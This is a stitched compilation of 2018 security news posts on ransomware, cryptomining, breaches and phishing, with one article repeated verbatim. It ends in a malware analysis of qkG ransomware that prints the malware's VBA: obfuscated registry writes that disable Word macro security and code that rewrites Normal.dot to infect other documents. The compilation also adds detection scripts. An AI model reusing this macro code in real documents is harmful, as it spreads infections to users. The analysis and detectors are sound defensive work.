Toward the end of the “Global Risks Report,” two short essays discussed the need for resilience in complex organizations and the dangers of cognitive bias in risk management. The first essay urged businesses to consider supplementing traditional risk assessments with a “resilience lens” that considers how to improve the organization’s ability to respond to risks.

The second argued that our current understanding of why people react strongly to certain risks but not others is incomplete. It also illustrated the dangers of anchoring and confirmation bias, highlighting top leadership’s tendency to “approach risk analysis as a standalone activity to be ticked off a list, but then fall short on mitigating the risks that their analysis has identified.”

Starting the Conversation With the ‘Global Risks Report’

The “Global Risks Report,” with its focus on world-scale economic opportunities and risks, is written for enterprise leaders in plain, business-friendly language. This year, cyberthreats figure prominently along the various global risks found in our increasingly complex and interconnected world. It makes it a perfect New Year’s gift for chief information security officers (CISOs) to share with their business leaders as a way to examine common concerns and build trust through stronger communication and engagement on a topic that is critical to the survival of organizations around the world.

The post Highlights From the World Economic Forum’s ‘Global Risks Report 2018’ appeared first on Security Intelligence.

How can we avoid another record year for breaches and ransomware?

More than 14.5 billion emails laced with malware were sent in 2017 according to the annual Global Security Report issued by AppRiver. The majority of cyber threats were initiated in the US and persisted throughout the year, with significant peaks in August, September and October. In the first half of 2017, 1.9 billion data records were lost or stolen as a result of cyberattacks. This followed a tough year in 2016, when losses totaled $16 … More

HOTforSecurity: Pro tip for 2018: treat the ransomware threat like an imminent hard drive failure

With the General Data Protection Regulation knocking on everyone’s door, breaches will have to be taken more seriously than ever. At the same time, new data indicates that ransomware attacks are rising steeply, which means neither organizations nor regular users can afford to sit around with their arms crossed.

Ransomware attacks doubled in 2017, and were the primary driver of an overall increase in total incidents, according to the latest Cyber Incident & Breach Trends Report from the Online Trust Alliance.

Reported cyber incidents targeting businesses also nearly doubled (from 82,000 in 2016 to 159,700 in 2017). However, since many cyberattacks are never reported, the alliance believes the actual number could be much higher.

Attacks seeking ransom accounted for half of all reported incidents. These included malware-laced phishing attacks, malvertising, drive-by malware, and even a new form of ransomware combined with denial of service (RDoS), where the attacker threatens to attack via denial-of-service if ransom is not paid.

In any case, ransomware has become a massive problem. From the massive WannaCry and Petya/GoldenEye contagions in 2017 to the more recent highly-targeted attacks hitting healthcare providers one after another, everyone is now a blip on cybercrooks’ radar.

Bitdefender predicts that ransomware will become more advanced and more sophisticated in 2018, potentially even using the GPU in your computer to speed up the encryption process. And ransomware-as-a-service platforms will make the threat even more accessible to one-off hackers, boosting the volume and complexity of ransomware samples to emerge this year.

But the real reason ransomware poses such a problem for everyone is its anatomy.

Why is ransomware so popular?

Ransomware is a highly efficient, highly lucrative form of malware. Three major drivers have propelled it to its sudden infamy:

  1. Ransomware can infect a computer through an array of attack vectors – from social engineering and spam to drive-by attacks, rigged popular applications, vulnerabilities, and malvertising – and render all data on that machine unusable.
  2. Until recently, you had to know code to hack someone; today, anyone can go to the Dark Web, buy the ransomware of their choosing, and attack.
  3. The anatomy of ransomware ensures that the damage produced is substantial while the attacker can remain completely anonymous, whether you pay him or not.

How to mitigate risk?

According to the same report, some 93 percent of all breaches could have been avoided had simple steps been taken. These can include:

  • regularly update software
  • block fake email messages using email authentication
  • train people to recognize phishing attacks
  • use browser-based scanning for malware
  • limit administrative access to data to contain the spread of an infection
  • use DDoS protection services to limit the impact of an attack

For large businesses, OTA makes the following recommendation:

“…since some organizations may determine that paying a ransom is the necessary course of action for a given incident, and Bitcoin is the most common form of payment request, it is recommended that organizations set up a Bitcoin wallet in advance. This type of proactive planning is not unlike establishing relationships in advance with crisis management firms, forensics specialists and law enforcement – it is easier to make logical, informed decisions during the calm than it is during the storm.”

However, most cybersecurity experts agree that victims should refrain from paying the ransom, as payment encourages criminals to strike again, and gives rise to new legions of hackers. Some law enforcement agencies advise the same.

At the same time, those same agencies (including the FBI) agree that sometimes the damage from lost data can be so large that it’s better to just pay and hope that the hackers stick to their end of the bargain – decrypt the data. But…

What if I don’t want to pay the ransom?

Since your data is inaccessible and unusable, getting infected with ransomware is the same as having your hard drive fail on you. And, make no mistake, hard drives do fail eventually!

“Viewing ransomware as an imminent hard drive failure points toward the simplest measure you can take: keep regular, offline backups of your important data,” says Bogdan Botezatu, senior e-threat analyst, Bitdefender. “This way, even if you get infected, you can always recover your important data, whether it’s photos of your cat, or millions of dollars’ worth of intellectual property.”

For more peace of mind, use a trusted antivirus solution. Bitdefender offers ransomware protection that sniffs out suspicious behavior before you can make a mistake and get infected. It is particularly paranoid about the security of your Documents folder or any other folder you deem highly sensitive, but it also keeps a close check on all files on your system. For Mac users, Bitdefender offers Time Machine backup protection –  to make sure ransomware and attackers can’t touch your backups.



HOTforSecurity

Pro tip for 2018: treat the ransomware threat like an imminent hard drive failure

With the General Data Protection Regulation knocking on everyone’s door, breaches will have to be taken more seriously than ever. At the same time, new data indicates that ransomware attacks are rising steeply, which means neither organizations nor regular users can afford to sit around with their arms crossed.

Ransomware attacks doubled in 2017, and were the primary driver of an overall increase in total incidents, according to the latest Cyber Incident & Breach Trends Report from the Online Trust Alliance.

Reported cyber incidents targeting businesses also nearly doubled (from 82,000 in 2016 to 159,700 in 2017). However, since many cyberattacks are never reported, the alliance believes the actual number could be much higher.

Attacks seeking ransom accounted for half of all reported incidents. These included malware-laced phishing attacks, malvertising, drive-by malware, and even a new form of ransomware combined with denial of service (RDoS), where the attacker threatens to attack via denial-of-service if ransom is not paid.

In any case, ransomware has become a massive problem. From the massive WannaCry and Petya/GoldenEye contagions in 2017 to the more recent highly-targeted attacks hitting healthcare providers one after another, everyone is now a blip on cybercrooks’ radar.

Bitdefender predicts that ransomware will become more advanced and more sophisticated in 2018, potentially even using the GPU in your computer to speed up the encryption process. And ransomware-as-a-service platforms will make the threat even more accessible to one-off hackers, boosting the volume and complexity of ransomware samples to emerge this year.

But the real reason ransomware poses such a problem for everyone is its anatomy.

Why is ransomware so popular?

Ransomware is a highly efficient, highly lucrative form of malware. Three major drivers have propelled it to its sudden infamy:

  1. Ransomware can infect a computer through an array of attack vectors – from social engineering and spam to drive-by attacks, rigged popular applications, vulnerabilities, and malvertising – and render all data on that machine unusable.
  2. Until recently, you had to know code to hack someone; today, anyone can go to the Dark Web, buy the ransomware of their choosing, and attack.
  3. The anatomy of ransomware ensures that the damage produced is substantial while the attacker can remain completely anonymous, whether you pay him or not.

How to mitigate risk?

According to the same report, some 93 percent of all breaches could have been avoided had simple steps been taken. These can include:

  • regularly update software
  • block fake email messages using email authentication
  • train people to recognize phishing attacks
  • use browser-based scanning for malware
  • limit administrative access to data to contain the spread of an infection
  • use DDoS protection services to limit the impact of an attack

For large businesses, OTA makes the following recommendation:

“…since some organizations may determine that paying a ransom is the necessary course of action for a given incident, and Bitcoin is the most common form of payment request, it is recommended that organizations set up a Bitcoin wallet in advance. This type of proactive planning is not unlike establishing relationships in advance with crisis management firms, forensics specialists and law enforcement – it is easier to make logical, informed decisions during the calm than it is during the storm.”

However, most cybersecurity experts agree that victims should refrain from paying the ransom, as payment encourages criminals to strike again, and gives rise to new legions of hackers. Some law enforcement agencies advise the same.

At the same time, those same agencies (including the FBI) agree that sometimes the damage from lost data can be so large that it’s better to just pay and hope that the hackers stick to their end of the bargain – decrypt the data. But…

What if I don’t want to pay the ransom?

Since your data is inaccessible and unusable, getting infected with ransomware is the same as having your hard drive fail on you. And, make no mistake, hard drives do fail eventually!

“Viewing ransomware as an imminent hard drive failure points toward the simplest measure you can take: keep regular, offline backups of your important data,” says Bogdan Botezatu, senior e-threat analyst, Bitdefender. “This way, even if you get infected, you can always recover your important data, whether it’s photos of your cat, or millions of dollars’ worth of intellectual property.”

For more peace of mind, use a trusted antivirus solution. Bitdefender offers ransomware protection that sniffs out suspicious behavior before you can make a mistake and get infected. It is particularly paranoid about the security of your Documents folder or any other folder you deem highly sensitive, but it also keeps a close check on all files on your system. For Mac users, Bitdefender offers Time Machine backup protection – to make sure ransomware and attackers can’t touch your backups.

WeLiveSecurity: FriedEx: BitPaymer ransomware the work of Dridex authors

In December 2017, we took a closer look at one of the FriedEx samples and almost instantly noticed the resemblance of the code to Dridex, thanks to our long-term research of its developments. Intrigued by the initial findings, we dug deep into the FriedEx samples.

The post FriedEx: BitPaymer ransomware the work of Dridex authors appeared first on WeLiveSecurity

Rise in cryptomining malware impacts organizations worldwide

Cybercriminals are increasingly turning to cryptominers to develop illegal revenue streams, while ransomware and malvertising adware continue to impact organizations worldwide, according to Check Point. During the period July to December 2017, one in five organizations were impacted by cryptomining malware, tools that enable cybercriminals to hijack the victim’s CPU or GPU power and existing resources to mine cryptocurrency, using as much as 65% of the end-user’s CPU power. Key malware trends in H2 2017 … More

Webroot Threat Blog: Cyber News Rundown: Evrial Trojan Targets Bitcoin Users

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst and a guy with a passion for all things security. Any questions? Just ask.

New Trojan Alters Bitcoin Addresses

A newly discovered trojan variant targets Bitcoin users and, more specifically, any Bitcoin addresses that may be copied into the device’s clipboard. The trojan “Evrial” can alter the address in the clipboard so funds are transferred elsewhere when a user performs a Bitcoin transaction. Additionally, Evrial is capable of stealing cookies and any credentials that are stored within web browsers to further compromise any purchases made on the device.

Paradise Ransomware is Anything But

In a recent return, new attacks have been linked to Paradise ransomware, which had been relatively quiet since its initial burst of attacks last year. Not much has changed for the variant since its previous reveal; it still requires a user to open a phony email attachment and unzip the packed infection. Unfortunately, there is no easy way to decrypt any of the affected files, and the user would need to either restore everything from a clean backup or pay the ransom, which varies based on the victim’s reply time.

Top UK Law Firms Face Massive Breach

Researchers have recently discovered several data dumps that contain over a million email credentials from several of the largest law firms in the UK. Based on the information found in the dumps, roughly 2,000 credentials belonged to each of the companies; the largest company is responsible for over 30,000 of them. Even worse, many of the dumps were released just in the last six months, though most come from third-party breaches.

Major Twitter Accounts Hacked

Several high-profile Twitter accounts were compromised over the last week and used to spread Turkish and Palestinian propaganda while attempting to phish the credentials of related accounts. Along with the credentials, it appears that private messages and other sensitive information were breached as well, leaving the compromised accounts even more vulnerable.

Business Security Moving Forward

Following a Ponemon Institute study from late last year, many were shocked at the results from the companies who responded. Over half of the 1,000 IT professionals surveyed claimed to have suffered a ransomware attack within the last year, and the majority of those reported the cause to be phishing and social engineering tactics. Even more worrisome, the average data breach involved the compromise of 9,000 unique records, costing victims several million dollars to return to normal.

The post Cyber News Rundown: Evrial Trojan Targets Bitcoin Users appeared first on Webroot Threat Blog.

Security Affairs: Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack

Jim Hagemann Snabe, chair of the shipping giant Maersk, revealed that the company reinstalled 45,000 PCs and 4,000 servers after the NotPetya attack.

The shipping giant Maersk was one of the companies that suffered the massive NotPetya attack. In August 2017 the company announced that it would incur hundreds of millions of U.S. dollars in losses due to the ransomware attack.

According to its second-quarter earnings report, the company expected losses of between $200 million and $300 million due to “significant business interruption,” because it was forced to temporarily halt critical systems infected with the ransomware.


Now the Møller-Maersk chair Jim Hagemann Snabe has shared further details on the attack suffered by the company during a speech at the World Economic Forum this week.

Snabe explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

The IT staff worked hard for ten days to restore normal operations.

“And that was done in a heroic effort over ten days,” Snabe said.

“Normally – I come from the IT industry – you would say that would take six months. I can only thank the employees and partners we had doing that.”

Snabe described the incident as a “very significant wake-up call,” adding that a strong security posture is essential for the development of a company’s business.

Snabe pointed out that Maersk was a victim of the militarization of cyberspace; the damage was caused by a cyber weapon used by a foreign government to hit Ukraine.

A Maersk ship docks somewhere in the world every 15 minutes, unloading between 10,000 and 20,000 containers. The effects of the attack were dramatic, and only the heroic effort of the staff who manually restored normal operations kept the damage contained.

Snabe claimed only “a 20 per cent drop in volumes,” and described the efforts of his IT staff as “human resilience”.

Snabe is aware of the risks faced by companies that operate on the Internet and urges an improvement of infrastructure.

“There is a need for a radical improvement of infrastructure,” he said.

The Maersk chair also highlighted the importance of collaboration between companies, technology companies, and law enforcement.

Pierluigi Paganini

(Security Affairs – NotPetya ransomware, Maersk)

The post Maersk chair revealed its company reinstalled 45,000 PCs and 4,000 Servers after NotPetya Attack appeared first on Security Affairs.

New ransomware dubbed MoneroPay targets crypto-fans, impersonates wallet

Crypto-fans are now being targeted by MoneroPay, a new ransomware released on Jan. 6 in a thread discussing altcoins on the popular crypto forum BitcoinTalk. Posing as a wallet for the SpriteCoin cryptocurrency, it was eagerly downloaded by enthusiasts hoping to make a lot of money fast.

The authors of the ransomware took advantage of the surge of interest in cryptocurrency to target tech-savvy users. Wallets of this kind are often flagged by security solutions, so many users have made a habit of disabling their security software to avoid false positives.

The hackers behind MoneroPay exploited this practice and built the malware to perfectly impersonate a regular wallet installation. Once installed on a device, MoneroPay started collecting user data and passwords saved in Firefox and Chrome and sending them to a C2 server.

Victims realized they were dealing with ransomware only after the full sync with the blockchain was completed and a message appeared announcing that their data had been encrypted.

According to BleepingComputer, the ransomware encrypts files with a wide range of extensions, including those used by programming languages, such as txt, doc, rtf, cpp, tcl, html, ppt, docx, xls, xlsx, pptx, key, pem, psd, mkv, mp4, ogv, zip, jpg, jpeg, work, pyw, hpp, cgi, rar, lua, img, iso, webm, jar, java, class, one, htm, css, vbs, eps, psf, png, apk, ps1, wallet.dat. MoneroPay appends the .encrypted extension to the files it encrypts.

Even though crypto-fans are usually tech savvy, malware developers gather insights from threads on the forum, and elsewhere, to take advantage of their weaknesses. This is precisely why such users need to take extra security measures, such as keeping regular backups of their data so it can be restored if encrypted or lost, and using a virtual machine to scan downloaded files before opening them to ensure they’re not malware.


New ransomware attack forces hospitals to turn away patients

Allscripts, a provider of electronic health record (EHR) technology to hospitals, was hit by ransomware this week, provoking an outage that affected thousands of physicians’ practices and healthcare providers across the United States.

Allscripts reportedly handles data for 180,000 physicians, 100,000 electronic prescribing physicians, 40,000 in-home clinicians, 2,700 hospitals, 13,000 extended care organizations and 7 million patients across the country. Besides EHR tools, it develops and sells solutions for patient engagement and care coordination, as well as financial and analytics technology.

Early this week, the company confirmed to partnering hospitals that it fell victim to a ransomware attack that crippled its systems.

Ransomware is malware that encrypts data on the endpoints it infects. If successful, the malware displays a note demanding payment – in the form of untraceable digital currency – in exchange for decrypting the data.

As reported by Healthcare IT News, facilities relying on their own servers were less severely affected than those relying on cloud-hosted services and applications supplied by Allscripts.

Cleveland’s News 5 confirmed this with doctors at Pulmonary Physicians in Canton. Because of the Allscripts outage, the office has not been able to access vital patient information and has been forced to turn away patients.

Like Hancock Health and Adams Memorial, Allscripts was apparently hit by the same type of ransomware – albeit a slightly different strain – dubbed SamSam. It emerged in 2016 and specifically targeted the healthcare industry.

SamSam spreads through web and Java apps, and specifically targets external-facing RDP servers. It relies on unsophisticated techniques (e.g., brute-force tools) to guess weak passwords and make its way into the network. Thanks to a wormable component, once it is inside it spreads laterally to infect other vulnerable systems.
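The password guessing against exposed RDP servers described above leaves a characteristic trace in the Windows Security log: a burst of failed logons (event 4625 with logon type 10, RemoteInteractive) from one source address, sometimes followed by a success (event 4624) from the same address. The following Python is an added example, not code from the article or from any product it mentions. It runs a sliding-window count over a constructed, simplified event format (real events would be pulled from the log and reduced to these five fields first) and raises one alert for the burst and a second, higher-priority alert when the same address later logs on successfully.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed sample, one Security event per line reduced to
# "timestamp,event_id,logon_type,source_ip,account".
# 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive (RDP).
SAMPLE_EVENTS = """\
2018-01-20T02:00:01,4625,10,203.0.113.7,administrator
2018-01-20T02:00:04,4625,10,203.0.113.7,admin
2018-01-20T02:00:07,4625,10,203.0.113.7,backup
2018-01-20T02:00:10,4625,10,203.0.113.7,administrator
2018-01-20T02:00:13,4625,10,203.0.113.7,administrator
2018-01-20T02:00:16,4625,10,203.0.113.7,administrator
2018-01-20T02:00:40,4624,10,203.0.113.7,administrator
2018-01-20T08:15:02,4625,10,198.51.100.4,jdoe
2018-01-20T08:15:20,4624,10,198.51.100.4,jdoe
2018-01-20T09:00:00,4625,3,203.0.113.9,svc_backup
"""

FAILED_LOGON, SUCCESSFUL_LOGON = 4625, 4624
RDP_LOGON_TYPE = 10


def parse_events(text: str) -> List[Tuple[datetime, int, int, str, str]]:
    """Parse the reduced event lines into (timestamp, event_id, logon_type, ip, account), oldest first."""
    events = []
    for line in text.strip().splitlines():
        ts, eid, ltype, ip, acct = line.split(",")
        events.append((datetime.fromisoformat(ts), int(eid), int(ltype), ip, acct))
    return sorted(events)


def detect_rdp_bruteforce(text: str, threshold: int = 5,
                          window: timedelta = timedelta(seconds=60)) -> List[Tuple[str, str, str]]:
    """Return (source_ip, alert_kind, detail) tuples.

    'bruteforce' fires once per source when at least `threshold` failed RDP
    logons fall inside one sliding `window`; 'success_after_bruteforce'
    fires when a source already flagged later logs on successfully, which
    is the case that needs an immediate response.
    """
    recent_failures = defaultdict(deque)   # ip -> timestamps of failures inside the window
    accounts_tried = defaultdict(set)      # ip -> account names attempted
    flagged = set()
    alerts = []
    for ts, eid, ltype, ip, acct in parse_events(text):
        if ltype != RDP_LOGON_TYPE:
            continue  # only RDP sessions are of interest here
        if eid == FAILED_LOGON:
            q = recent_failures[ip]
            q.append(ts)
            while ts - q[0] > window:      # drop failures that fell out of the window
                q.popleft()
            accounts_tried[ip].add(acct)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce",
                               f"{len(q)} failed RDP logons within {int(window.total_seconds())}s; "
                               f"accounts tried: {sorted(accounts_tried[ip])}"))
        elif eid == SUCCESSFUL_LOGON and ip in flagged:
            alerts.append((ip, "success_after_bruteforce",
                           f"successful RDP logon as {acct} after brute-force activity"))
    return alerts


if __name__ == "__main__":
    for ip, kind, detail in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(f"{kind:26} {ip:15} {detail}")
```

On the constructed sample the single mistyped password from 198.51.100.4 produces nothing, while 203.0.113.7 triggers both alerts; the threshold and window are the knobs to tune against an environment's normal failure rate, and the second alert kind is the one worth paging on.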

David Finn, an executive at consulting firm CynergisTek, points out that organizations use endpoint protection tools but forget to lock up servers with antimalware solutions.

“It needs to be on all of your endpoints. We sometimes forget about those servers being endpoints,” said Finn.

Allscripts has not yet issued a public statement on the attack.


Presenting: Malwarebytes Labs 2017 State of Malware Report

2017 was a tumultuous year in politics, media, gender, race—and cybersecurity didn’t beat the rap. Last year was full of twists and turns in the cybercrime world, with major outbreaks, new infection methods, and the evolution of the cryptocurrency crime industry.

In aiming to make sense of the madness, we gathered information from our data science, research, and intel teams throughout the year, checking in on trends, the rise and fall of malware families, distribution methods, and more. What we came up with was a more complete picture of the 2017 threat landscape that showed us just how much can change in a year.

In our 2017 State of Malware report, we examined attack methods, malware developments, and distribution techniques used by cybercriminals over the last 12 months. We dove into the exponential increases of malware volume and severity year-over-year, as well as trends in high-impact threats, such as ransomware and cryptomining. Some of our key takeaways include:

Ransomware volume was up in 2017, but trending downward.

Ransomware detections were up 90 and 93 percent for businesses and consumers respectively in 2017, with several splashy outbreaks accounting for the majority of the increase in rates. However, development of new families and tactics for delivery slowed way down, especially in the last quarter of the year.

What they can’t hold for ransom, criminals will steal instead.

With ransomware slowly going out of favor, criminals pivoted to banking Trojans, spyware, and hijackers in 2017 to attack companies instead. We saw an increase of 40 percent in hijackers and 30 percent in spyware detections in 2017. The second half of the year also marked an average of 102 percent increase in banking Trojan detections.

Cryptomining is out of control.

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

In addition to looking back at 2017, we looked forward to 2018, analyzing current trends and pontificating on what they point to. We realize making predictions about cybercrime is a bit more art than science, but when we look back over years of patterns and data and experience, we can make some educated guesses about where we think this is all going. With that in mind, some of our 2018 predictions include:

A “slow” year for Internet of Things threats means more attacks in 2018.

Attackers spent a lot of time in 2017 developing new tools to take advantage of IoT with spam-spreading botnets and, likely, more DDoS attacks. It’s not farfetched to think we may see DDoS attacks against large organizations, like airline companies and power utilities, demanding a ransom to call off an army of botnet-infected IoT devices. But rather than encrypt files, the attacks will disrupt businesses and their operations until payment has been made.

Cryptocurrency mining fever will give birth to dangerous new threats.

Drive-by mining and skyrocketing values are driving interest in cryptomining from both users and criminals alike—to the point where retailers are now screening potential graphics card customers for miners. Faced with continued volatility, we are likely going to see an evolution of drive-by mining tools, new mining platforms (such as Android and IoT devices), and new forms of malware designed to mine and/or steal cryptocurrency.

To see our complete analysis of key developments in malware, the most interesting attack vectors of the year, predictions for 2018, and more, read the 2017 State of Malware report.

The post Presenting: Malwarebytes Labs 2017 State of Malware Report appeared first on Malwarebytes Labs.

Three-Quarters of Organizations Experienced Phishing Attacks in 2017, Report Uncovers

Phishing attacks continue to threaten organizations’ digital security in droves. Kaspersky Lab prevented 46,557,343 phishing attempts in the second quarter of 2017 alone. Overall, close to one in ten (8.26%) of Kaspersky users encountered a phishing attack that quarter. Recognizing the prevalence of phishing, it’s useful to examine the granular details of this attack method. […]… Read More

The post Three-Quarters of Organizations Experienced Phishing Attacks in 2017, Report Uncovers appeared first on The State of Security.

Hunton Publishes Retail Year in Review

On January 18, 2018, Hunton & Williams LLP’s retail industry lawyers, composed of more than 100 lawyers across practices, released their annual Retail Year in Review publication. The Retail Year in Review includes several articles authored by our Global Privacy and Cybersecurity lawyers, and touches on many topics of interest including blockchain, ransomware, cyber insurance and the Internet of Things.

Read the full publication.

Human trafficking victims forced to defraud Chinese computer users

Late last week, the Croatian police executed a coordinated raid on two houses where 59 individuals were confined and forced into defrauding Chinese and Taiwanese computer and smartphone users through a police-ransom-type-of-scheme. According to an announcement by the Croatian Ministry of the Interior, the raids were the result of a months-long joint investigation with the Slovenian National Police and a collaboration with the People’s Republic of China’s police force. The 59 individuals – mostly from … More

Engineering Firm Pays $1.3K after Ransomware Affects Servers, Backups

An engineering firm in Canada has paid attackers $1,300 after ransomware encrypted its servers along with its data backup system. The infection occurred when bad actors targeted DGH Engineering Ltd. with a malicious email. An employee at the firm, which maintains offices near Winnipeg, Manitoba and Red Deer, Alberta, clicked on a link contained therein. […]… Read More

The post Engineering Firm Pays $1.3K after Ransomware Affects Servers, Backups appeared first on The State of Security.

qkG: Simple Malware, Tricky Ransomware

By Oleg Boyarchuk, edited by Stefano Ortolani

Introduction

When ransomware behavior is clearly exhibited, it is relatively easy for a sandbox or a personal A/V to assert detection; after all, in its simplest form, ransomware malware must at least: (1) search for files to be encrypted, and (2) overwrite those files with their encrypted representation. Lastline Labs’ Alexander Sevtsov covered a deep dive on ransomware behavior not so long ago in Ransomware: Too Overt to Hide. Nevertheless, when it comes to detecting ransomware targeting specific files, things might get a tad more complicated. This is the case of qkG, a malware (sha1=a9174fec5d81977eee9de2658a92fa9e4de76dd4) designed to infect documents and encrypt their content (our friends at TrendMicro did an excellent job outlining the encryption process and uncovering the encryption key in this report).

How it Works

Documents infected by qkG come with an embedded VBA script that gets executed when the document is opened (note that macros must be manually enabled for the malicious code to execute). The VBA includes the following ransom note (which, incidentally, is unique and thus a good candidate for a YARA signature):

Signature = "I'm QkG@PTM17! by TNA@MHT-TT2"
sInfo = "Send $300 to BTC Address: 14zA1NdTgtesLWZxtysLQQtsuKzjFbpydg" & vbCrLf & "Contact Email: mht-tt2@protonmail.com"

qkG infects the Normal.dot template file, so that any other document the user opens afterwards becomes infected. Obviously, in order to avoid suspicion, qkG immediately tries to lower the Microsoft Office security settings, both to gain access to the VBA object model and to enable macros permanently:

System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "Acces" + "sVBOM") = 1
System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "VBAW" + "arnings") = 1

This is done via the System.PrivateProfileString property, which has the interesting feature of writing REG_SZ values rather than REG_DWORD. Unfortunately for the malware authors, who must have overlooked this fact, Microsoft Word is not able to read REG_SZ values. This means that opening an infected document will always require the following two conditions to be met, regardless of what the code actually tried to achieve:

  1. The VBA object model must have been manually enabled by the user;
  2. Macros must be enabled every single time a document is opened.

Note that even if the malware fails to automatically enable macros, the Lastline sandbox still detects this attempt and reports it as “Lowering macro security” with a high score. If condition (1) is met, qkG infects Normal.dot with its own code:

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
...
If NTLines > 0 Then NT.CodeModule.DeleteLines 1, NTLines
NT.Name = "qkG"
NT.CodeModule.AddFromString ("Private Sub Document_Close()")
NT.CodeModule.InsertLines 2, AD.CodeModule.Lines(2, ADLines - 1)

The code inside Normal.dot is then used to infect any other document the user might open afterwards:

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
...
If ADLines > 0 Then AD.CodeModule.DeleteLines 1, ADLines
AD.Name = "qkG"
AD.CodeModule.AddFromString ("Private Sub Document_Open()")
AD.CodeModule.InsertLines 2, NT.CodeModule.Lines(2, NTLines - 1)

Generally speaking, modifying macro code via CodeModule.DeleteLines and CodeModule.InsertLines is a suspicious activity per se, and it is in fact flagged as such by the Lastline static document analyzer. As we can see from the code itself, the actual infection happens when the document is closed (Document_Close()), which shows how important it is for a sandbox to faithfully replicate the activity of a real user.
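The three indicators this section describes (the unique ransom-note signature, the write to Word's Security registry key built from concatenated string fragments, and the CodeModule rewrites of the Normal template) can be checked statically once the VBA source has been extracted from a document. The following Python is an added example, not Lastline's analyzer or code from the TrendMicro report. It first collapses the `"HKEY_CUR" + "RENT_USER"`-style literal splitting, because a plain pattern match on the raw source would miss the registry path entirely, and then reports which indicators are present. The VBA sample inside it is constructed from the snippets quoted above; it is assumed that the macro source has already been pulled out of the .doc (for instance with a tool like olevba).

```python
import re
from typing import Dict

# Constructed VBA sample modelled on the qkG snippets quoted above. It is
# assumed to be the macro source already extracted from a document.
SAMPLE_VBA = r'''
Private Sub Document_Close()
Signature = "I'm QkG@PTM17! by TNA@MHT-TT2"
System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "Acces" + "sVBOM") = 1
System.PrivateProfileString("", "HKEY_CUR" + "RENT_USER\Sof" + "tware\Micros" + "oft\Off" + "ice\" & Ver & "\Wo" + "rd\Secu" + "rity", "VBAW" + "arnings") = 1
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If NTLines > 0 Then NT.CodeModule.DeleteLines 1, NTLines
NT.CodeModule.AddFromString ("Private Sub Document_Close()")
NT.CodeModule.InsertLines 2, AD.CodeModule.Lines(2, ADLines - 1)
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_VBA = '''
Private Sub Document_Open()
    MsgBox "Welcome to the quarterly report"
End Sub
'''

# Two adjacent string literals glued with + or & (VBA accepts both operators).
_ADJACENT = re.compile(r'"([^"\n]*)"\s*[+&]\s*"([^"\n]*)"')


def join_literals(src: str) -> str:
    """Collapse "abc" + "def" / "abc" & "def" chains into a single literal.

    Repeats until the text stops changing so chains of any length merge.
    Variables spliced into a chain (the `& Ver &` version number above) stay
    in place; doubled quotes inside VBA strings are not handled.
    """
    prev = None
    while prev != src:
        prev = src
        src = _ADJACENT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


# Indicators taken from the behaviour described in the text. The registry
# pattern tolerates the spliced-in version variable between Office\ and \Word.
INDICATORS = {
    "qkg_signature": re.compile(re.escape("I'm QkG@PTM17! by TNA@MHT-TT2")),
    "word_security_key_write": re.compile(
        r'PrivateProfileString\([^\n]*?HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\'
        r'[^\n]*?\\Word\\Security[^\n]*?(AccessVBOM|VBAWarnings)',
        re.IGNORECASE),
    "normal_template_vbproject": re.compile(r'NormalTemplate\.VBProject', re.IGNORECASE),
    "codemodule_rewrite": re.compile(
        r'CodeModule\.(DeleteLines|InsertLines|AddFromString)', re.IGNORECASE),
}


def scan_vba(src: str) -> Dict[str, bool]:
    """Return which indicators fire on the de-obfuscated macro source."""
    normalized = join_literals(src)
    return {name: bool(rx.search(normalized)) for name, rx in INDICATORS.items()}


def is_qkg_like(src: str) -> bool:
    """Verdict: the unique signature alone, or the combination of lowering
    Word's macro security and rewriting a module's code, is enough."""
    hits = scan_vba(src)
    return hits["qkg_signature"] or (
        hits["word_security_key_write"] and hits["codemodule_rewrite"])


if __name__ == "__main__":
    for label, sample in (("qkG-like sample", SAMPLE_VBA), ("benign sample", BENIGN_VBA)):
        verdict = "SUSPICIOUS" if is_qkg_like(sample) else "clean"
        print(f"{label}: {scan_vba(sample)} -> {verdict}")
```

The signature string is the cheap, exact match the text suggests for a YARA rule; the other two indicators are the ones that survive a trivial change of the ransom note, which is why the verdict accepts either. On a host, the complementary check is whether AccessVBOM and VBAWarnings under the user's Word Security key have been turned into REG_SZ values, since, as explained above, that is the trace the macro leaves even when Word ignores the setting.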

A Peculiar Behavior

Every time a document is either opened or closed, the malware encrypts the whole text and prepends the following ransom note:

This is quite unique, and it deviates from the ransomware behavior we usually see in malware such as WannaCry or BadRabbit where all files matching a set of extensions get encrypted. In this case, encryption, and thus the actual ransomware behavior, is tied to what the user is doing, and in particular to what documents he/she opens. Any technique tailored to detect ransomware in the general case would just fail here.

Conclusion

